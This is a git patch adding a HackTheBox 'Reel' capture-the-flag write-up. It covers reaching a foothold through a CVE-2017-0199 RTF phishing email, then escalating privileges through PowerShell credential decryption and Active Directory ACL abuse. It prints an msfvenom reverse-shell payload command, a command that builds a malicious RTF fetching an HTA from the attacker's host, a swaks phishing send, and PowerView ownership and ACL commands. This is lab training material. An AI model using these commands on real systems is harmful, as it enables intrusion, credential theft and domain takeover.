From eb3d84102aebe1862a10028de120c0b688187c34 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sun, 9 Jan 2022 05:02:24 +0500
Subject: [PATCH] Create Reel.md
---
HackTheBox/Reel.md | 248 +++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 248 insertions(+)
create mode 100644 HackTheBox/Reel.md
diff --git a/HackTheBox/Reel.md b/HackTheBox/Reel.md
new file mode 100644
index 0000000..c2dcea4
--- /dev/null
+++ b/HackTheBox/Reel.md
@@ -0,0 +1,248 @@
+# HackTheBox-Reel
+
+## NMAP
+
+```bash
+
+PORT STATE SERVICE VERSION
+21/tcp open ftp Microsoft ftpd
+| ftp-anon: Anonymous FTP login allowed (FTP code 230)
+|_05-28-18 11:19PM
documents
+| ftp-syst:
+|_ SYST: Windows_NT
+22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
+| ssh-hostkey:
+| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
+| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
+|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
+25/tcp open smtp?
+| fingerprint-strings:
+| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLS
+SessionReq, X11Probe:
+| 220 Mail Service ready
+| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
+| 220 Mail Service ready
+| sequence of commands
+| sequence of commands
+| Hello:
+| 220 Mail Service ready
+| EHLO Invalid domain address.
+| Help:
+| 220 Mail Service ready
+| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\
+| SIPOptions:
+| 220 Mail Service ready
+| sequence of commands
+| sequence of commands
+| sequence of commands
+| sequence of commands
+| sequence of commands
+| sequence of commands
+```
+
+## PORT 21 (FTP)
+
+FTP has anonymous login enabled so we can easily login
+
+
+
+We see a folder named `documents`
+
+
+
+And in the folder we can see three files
+
+
+
+
+
+Opening the `Applocker.docx` file it tell about making rules for some scripts
+
+
+
+Opening `Windows Event Forwarding.docx` will warn us having a macro in it and will fail to recover document
+
+
+
+Lastly the text file has this conent in it
+
+```
+Please email me any rtf format procedures - I'll review and convert.
+new format / converted documents will be saved here.
+```
+
+So from this file it pretty much tells that we need to make a phishing rtf document and send it through mail but the question is send to whom ? We don't have any smb or ldap service which we can try to enumerate users from only smtp service is from where which can enumerate users but we do need a user first so running `exiftool` on word documents we get a username
+
+
+
+
+## PORT 25 (SMTP)
+
+To check if it's a correct email addres we can use `VRFY` to check but that command is not allowed in this smtp server
+
+
+
+Instead we can use `RCPT` to check if the email address is valid
+
+
+
+And `nico@megabank.com` is a valid address on which we can send an email , now to send a rtf file windows had a CVE related to rtf which can allow remote commands to be executed which was given a CVE `CVE-2017-0199`
+
+
+http://rewtin.blogspot.com/2017/04/cve-2017-0199-practical-exploitation-poc.html
+
+
+## Foothold
+
+Using an exploit from github we can craft a rtf in which we are going to include a url that will fetch hta file and it will execute on the system to give us a reverse shell for that we need to genrate a hta file using `msfvenom`
+
+```bash
+sfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh
+> abc.hta
+```
+
+```bash
+python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.1
+0.14.17/abc.hta
+```
+
+
+
+Now to send the mail with the attachment , I was having difficulty to figure out to send it , on goolge every mentioned doing it through telnet by specifiying content-type and other headers but I found a neat tool called `sawks`
+
+http://www.jetmore.org/john/code/swaks/
+
+So running this to send an email to `nico` and starting the python server to hosts the hta file
+
+
+
+
+
+
+```bash
+swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf
+```
+
+
+
+In `nico`'s directory in `Desktop` folder we can see a `cred.xml` file, reading that file it seems that there's an encrpyted password for `Tom`
+
+
+
+## Privilege Escalation (Tom)
+
+Now here I ran into an issue to decrpyt this we need powershell and when I ran powershell the reverse shell would just hang
+
+
+
+So we can just pass arguemnts to powershell and decrypt the password for user `Tom`
+
+```powershell
+powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password"
+```
+
+
+
+Now that we have credentials for tom user we can use ssh to login
+
+
+
+Checking which groups this user is in
+
+
+
+In the Desktop directory we see a folder `AD Audit` which already has bloodhound folder in it
+
+
+
+
+
+And from the text file it seems that no path is there to domain admin
+
+
+
+We can import and run `PowerView` commands but I am just more comfortable with using bloodhound but we can't actually import sharphound script from the machine
+
+
+
+## Privilege Escalation (Claire)
+
+So we can bypass this by loading the script in the memory through `IEX` which downloads the script and loads it into the memory
+
+
+
+```powershell
+`Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip`
+```
+
+
+
+To transfer this we can use impacket's smbserver to copy the zip file onto our machine
+
+
+
+
+
+After this is transferred we can use bloodhound GUI to see what we can abuse in AD
+
+
+
+We have `WriteOwner` access on claire object so we can own this object and give `All` rights on this object in order to reset password
+
+```powershell
+Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose
+```
+
+
+
+```powershell
+Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose
+```
+
+
+
+
+
+
+
+## Privilege Escalation (Administrator)
+
+Now through `Claire` we can see that we have `WriteDacl` on `BACKUP_ADMINS`
+
+
+
+
+
+We can see the absue that we can add users to this group
+
+
+
+So logging in back with tom we see that we are a member of this group now
+
+
+
+But it gets reverted quickly so we need to be quick in navigating to `Administrators` folder and there we will find some backup scripts out which `BackupScript.ps1` has a password for administrator account
+
+
+
+
+
+Having the password we can login through ssh
+
+
+
+Further loading `Mimikatz` we can dump SAM hashes
+
+
+
+
+
+## References
+
+- https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
+- https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
+- https://github.com/bhdresh/CVE-2017-0199
+- https://linux.die.net/man/1/swaks
+- http://www.jetmore.org/john/code/swaks/
+- https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
+- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993